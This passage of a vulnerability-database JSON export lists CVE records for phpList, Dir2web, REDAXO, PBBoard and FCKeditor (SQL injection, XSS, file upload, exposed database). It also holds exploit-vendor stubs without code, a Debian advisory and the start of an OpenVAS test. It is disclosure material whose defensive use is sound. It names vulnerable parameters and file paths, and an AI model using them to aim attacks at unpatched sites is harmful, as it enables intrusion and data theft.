"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3953"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:phplist:phplist:2.10.18", "cpe:/a:phplist:phplist:2.10.13", "cpe:/a:phplist:phplist:2.8.2", "cpe:/a:phplist:phplist:2.10.16", "cpe:/a:phplist:phplist:2.10.17", "cpe:/a:phplist:phplist:2.7.2", "cpe:/a:phplist:phplist:2.10.7", "cpe:/a:phplist:phplist:2.10.4", "cpe:/a:phplist:phplist:2.6.5", "cpe:/a:phplist:phplist:2.10.9", "cpe:/a:phplist:phplist:2.10.10", "cpe:/a:phplist:phplist:2.10.12", "cpe:/a:phplist:phplist:2.10.1", "cpe:/a:phplist:phplist:2.10.8", "cpe:/a:phplist:phplist:2.10.14", "cpe:/a:phplist:phplist:2.10.2", "cpe:/a:phplist:phplist:2.10.15", "cpe:/a:phplist:phplist:2.10.5", "cpe:/a:phplist:phplist:2.7.1", "cpe:/a:phplist:phplist:2.10.11", "cpe:/a:phplist:phplist:2.8.7", "cpe:/a:phplist:phplist:2.8.12", "cpe:/a:phplist:phplist:2.10.3"], "id": "CVE-2012-3953", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3953", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phplist:phplist:2.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.9:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.14:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.16:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.8:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.13:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.7:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.18:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.15:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.12:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.10:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.5:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.17:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:20", "description": "Cross-site scripting (XSS) vulnerability in admin/index.php in phpList before 2.10.19 allows remote attackers to inject arbitrary web script or HTML via the unconfirmed parameter to the user page.", "cvss3": {}, "published": "2012-08-12T00:55:00", "type": "cve", "title": "CVE-2012-3952", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3952"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:phplist:phplist:2.10.18", "cpe:/a:phplist:phplist:2.10.13", "cpe:/a:phplist:phplist:2.8.2", "cpe:/a:phplist:phplist:2.10.16", "cpe:/a:phplist:phplist:2.10.17", "cpe:/a:phplist:phplist:2.7.2", "cpe:/a:phplist:phplist:2.10.7", "cpe:/a:phplist:phplist:2.10.4", "cpe:/a:phplist:phplist:2.6.5", "cpe:/a:phplist:phplist:2.10.9", "cpe:/a:phplist:phplist:2.10.10", "cpe:/a:phplist:phplist:2.10.12", "cpe:/a:phplist:phplist:2.10.1", "cpe:/a:phplist:phplist:2.10.8", "cpe:/a:phplist:phplist:2.10.14", "cpe:/a:phplist:phplist:2.10.2", "cpe:/a:phplist:phplist:2.10.15", "cpe:/a:phplist:phplist:2.10.5", "cpe:/a:phplist:phplist:2.7.1", "cpe:/a:phplist:phplist:2.10.11", "cpe:/a:phplist:phplist:2.8.7", "cpe:/a:phplist:phplist:2.8.12", "cpe:/a:phplist:phplist:2.10.3"], "id": "CVE-2012-3952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3952", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phplist:phplist:2.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.9:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.14:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.16:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.8:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.13:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.7:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.18:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.15:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.12:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.10:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.5:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.17:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:48:29", "description": "SQL injection vulnerability in system/src/dispatcher.php in Dir2web 3.0 allows remote attackers to execute arbitrary SQL commands via the oid parameter in a homepage action to index.php.", "cvss3": {}, "published": "2012-08-12T17:55:00", "type": "cve", "title": "CVE-2012-4070", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4070"], "modified": "2012-08-13T04:00:00", "cpe": ["cpe:/a:dir2web:dir2web:3.0"], "id": "CVE-2012-4070", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4070", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:dir2web:dir2web:3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:45:29", "description": "Cross-site scripting (XSS) vulnerability in include/classes/class.rex_list.inc.php in REDAXO 4.3.x and 4.4 allows remote attackers to inject arbitrary web script or HTML via the subpage parameter to index.php.", "cvss3": {}, "published": "2012-08-13T20:55:00", "type": "cve", "title": "CVE-2012-3869", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3869"], "modified": "2012-08-14T04:00:00", "cpe": ["cpe:/a:redaxo:redaxo:4.3.3", "cpe:/a:redaxo:redaxo:4.4", "cpe:/a:redaxo:redaxo:4.3", "cpe:/a:redaxo:redaxo:4.3.2", "cpe:/a:redaxo:redaxo:4.3.1"], "id": "CVE-2012-3869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3869", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:redaxo:redaxo:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:redaxo:redaxo:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:redaxo:redaxo:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:redaxo:redaxo:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:redaxo:redaxo:4.3.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:48:27", "description": "Dir2web 3.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database via a direct request for system/db/website.db.", "cvss3": {}, "published": "2012-08-12T17:55:00", "type": "cve", "title": "CVE-2012-4069", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4069"], "modified": "2012-08-13T04:00:00", "cpe": ["cpe:/a:dir2web:dir2web:3.0"], "id": "CVE-2012-4069", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4069", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:dir2web:dir2web:3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:59", "description": "Multiple SQL injection vulnerabilities in PBBoard 2.1.4 allow remote attackers to execute arbitrary SQL commands via the (1) username parameter to the send page, (2) email parameter to the forget page, (3) password parameter to the forum_archive page, (4) section parameter to the management page, (5) section_id parameter to the managementreply page, (6) member_id parameter to the new_password page, or (7) subjectid parameter to the tags page to index.php.", "cvss3": {}, "published": "2012-08-12T00:55:00", "type": "cve", "title": "CVE-2012-4034", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4034"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:pbboard:pbboard:2.1.4"], "id": "CVE-2012-4034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4034", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pbboard:pbboard:2.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:22", "description": "Cross-site scripting (XSS) vulnerability in the print_textinputs_var function in editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php in FCKeditor 2.6.7 and earlier allows remote attackers to inject arbitrary web script or HTML via textinputs array parameters.", "cvss3": {}, "published": "2012-07-12T21:55:00", "type": "cve", "title": "CVE-2012-4000", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:ckeditor:fckeditor:1.6", "cpe:/a:ckeditor:fckeditor:0.9.5", "cpe:/a:ckeditor:fckeditor:2.6.3", "cpe:/a:ckeditor:fckeditor:0.9.0", "cpe:/a:ckeditor:fckeditor:2.2", "cpe:/a:ckeditor:fckeditor:1.2.2", "cpe:/a:ckeditor:fckeditor:0.9.2", "cpe:/a:ckeditor:fckeditor:2.5", "cpe:/a:ckeditor:fckeditor:1.0", "cpe:/a:ckeditor:fckeditor:2.1.1", "cpe:/a:ckeditor:fckeditor:2.3.3", "cpe:/a:ckeditor:fckeditor:2.3.2", "cpe:/a:ckeditor:fckeditor:2.3", "cpe:/a:ckeditor:fckeditor:0.9.4", "cpe:/a:ckeditor:fckeditor:2.5.1", "cpe:/a:ckeditor:fckeditor:2.6.7", "cpe:/a:ckeditor:fckeditor:1.4", "cpe:/a:ckeditor:fckeditor:2.4.1", "cpe:/a:ckeditor:fckeditor:2.6.2", "cpe:/a:ckeditor:fckeditor:1.1", "cpe:/a:ckeditor:fckeditor:1.2.4", "cpe:/a:ckeditor:fckeditor:2.4", "cpe:/a:ckeditor:fckeditor:1.3.1", "cpe:/a:ckeditor:fckeditor:2.6.4", "cpe:/a:ckeditor:fckeditor:2.1", "cpe:/a:ckeditor:fckeditor:2.6.5", "cpe:/a:ckeditor:fckeditor:2.0", "cpe:/a:ckeditor:fckeditor:2.6", "cpe:/a:ckeditor:fckeditor:1.3", "cpe:/a:ckeditor:fckeditor:0.9.1", "cpe:/a:ckeditor:fckeditor:2.4.2", "cpe:/a:ckeditor:fckeditor:2.3.1", "cpe:/a:ckeditor:fckeditor:2.4.3", "cpe:/a:ckeditor:fckeditor:2.6.1", "cpe:/a:ckeditor:fckeditor:1.5", "cpe:/a:ckeditor:fckeditor:0.8.5", "cpe:/a:ckeditor:fckeditor:0.9.3", "cpe:/a:ckeditor:fckeditor:1.2", "cpe:/a:ckeditor:fckeditor:2.6.4.1", "cpe:/a:ckeditor:fckeditor:0.8"], "id": "CVE-2012-4000", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4000", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ckeditor:fckeditor:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.3:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.3:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.5:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.0:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.2:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.8.5:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.0:fc:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:fc:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.5:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.4:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6:rc:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.1:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.8:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.4:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.3:beta:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:48:01", "description": "Unrestricted file upload vulnerability in admin.php in PBBoard 2.1.4 allows remote administrators to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a direct request to the file in the addons directory. NOTE: this vulnerability can be leveraged by remote attackers using CVE-2012-1216.", "cvss3": {}, "published": "2012-08-27T23:55:00", "type": "cve", "title": "CVE-2012-4036", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1216", "CVE-2012-4036"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:pbboard:pbboard:2.1.4"], "id": "CVE-2012-4036", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4036", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pbboard:pbboard:2.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:20:47", "description": "SQL injection vulnerability in the CheckEmail function in includes/functions.class.php in PBBoard 3.0.1 before 20141128 allows remote attackers to execute arbitrary SQL commands via the email parameter in the register page to index.php. NOTE: the email parameter in the forget page vector is already covered by CVE-2012-4034.2.", "cvss3": {}, "published": "2014-12-05T15:59:00", "type": "cve", "title": "CVE-2014-9215", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4034", "CVE-2014-9215"], "modified": "2018-10-09T19:55:00", "cpe": ["cpe:/a:pbboard:pbboard:3.0.1"], "id": "CVE-2014-9215", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9215", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pbboard:pbboard:3.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:06:15", "description": "Cross-site scripting (XSS) vulnerability in editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php in FCKeditor before 2.6.11 and earlier allows remote attackers to inject arbitrary web script or HTML via an array key in the textinputs[] parameter, a different issue than CVE-2012-4000.", "cvss3": {}, "published": "2014-06-11T14:55:00", "type": "cve", "title": "CVE-2014-4037", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000", "CVE-2014-4037"], "modified": "2015-08-28T15:51:00", "cpe": ["cpe:/a:ckeditor:fckeditor:2.6.10"], "id": "CVE-2014-4037", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4037", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ckeditor:fckeditor:2.6.10:*:*:*:*:*:*:*"]}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "SQL Injection vulnerabilty in PBBoard index.php username parameter\n\nVulnerability Type: SQL Injection", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "PBBoard 2.1.4 username SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4034"], "modified": "2014-11-30T00:00:00", "id": "E-413", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "SQL Injection vulnerabilty in PBBoard index.php email parameter\n\nVulnerability Type: SQL Injection", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "PBBoard 2.1.4 email SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4034"], "modified": "2014-11-30T00:00:00", "id": "E-411", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T23:48:49", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2522-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nAugust 05, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : fckeditor\nVulnerability : cross site scripting\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-4000\nDebian Bug : 683418\n\nEmilio Pinna discovered a cross site scripting vulnerability in the\nspellchecker.php page of FCKeditor, a popular html/text editor for the web.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:2.6.6-1squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1:2.6.6-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.6-3.\n\nWe recommend that you upgrade your fckeditor packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2012-08-06T08:22:53", "type": "debian", "title": "[SECURITY] [DSA 2522-1] fckeditor security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000"], "modified": "2012-08-06T08:22:53", "id": "DEBIAN:DSA-2522-1:47EAF", "href": "https://lists.debian.org/debian-security-announce/2012/msg00163.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:38:41", "description": "The remote host is missing an update to fckeditor\nannounced via advisory DSA 2522-1.", "cvss3": {}, "published": "2012-08-10T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2522-1 (fckeditor)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231071499", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071499", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2522_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2522-1 (fckeditor)\n#\n# Authors:\n# 